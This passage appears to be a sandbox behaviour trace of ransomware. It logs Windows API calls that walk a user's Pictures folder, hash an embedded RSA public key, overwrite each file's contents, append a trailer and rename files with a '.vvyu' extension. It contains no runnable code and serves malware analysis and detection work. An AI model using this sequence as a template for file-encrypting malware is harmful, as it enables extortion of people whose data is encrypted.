"c:\\users\\keecfmwgj\\pictures\\nthxrlnnkw.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\NThXrLNnKw.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\nthxrlnnkw.gif.vvyu")) returned 1 [0187.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.565] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.568] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00212c0, ftCreationTime.dwHighDateTime=0x1d89e12, ftLastAccessTime.dwLowDateTime=0xbfa089d0, ftLastAccessTime.dwHighDateTime=0x1d8a129, ftLastWriteTime.dwLowDateTime=0xbfa089d0, ftLastWriteTime.dwHighDateTime=0x1d8a129, nFileSizeHigh=0x0, nFileSizeLow=0xe68f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V89DayYK-6YpvEr4NY.gif", cAlternateFileName="V89DAY~1.GIF")) returned 1 [0187.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d00 [0187.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0187.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d00 | out: hHeap=0x6a0000) returned 1 [0187.568] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\V89DayYK-6YpvEr4NY.gif") returned=".gif" [0187.568] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\V89DayYK-6YpvEr4NY.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\v89dayyk-6ypver4ny.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.569] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=59023) returned 1 [0187.570] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.572] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe669, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.572] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.575] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.575] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe68f, lpOverlapped=0x0) returned 1 [0187.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.577] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.578] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.578] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.578] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.578] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.578] GetLastError () returned 0x0 [0187.578] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.578] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.579] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.579] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.579] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe690) returned 0x2d43778 [0187.579] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d00 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d48 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.581] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397a8 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39790 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0187.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.584] GetCurrentThreadId () returned 0x264 [0187.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37e28 [0187.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.585] GetCurrentThreadId () returned 0x264 [0187.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0187.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397a8 [0187.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39808 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39820 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397c0 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39790 [0187.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d48 | out: hHeap=0x6a0000) returned 1 [0187.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.597] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xe68a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xe68a, lpOverlapped=0x0) returned 1 [0187.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.598] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe68f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.598] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.599] 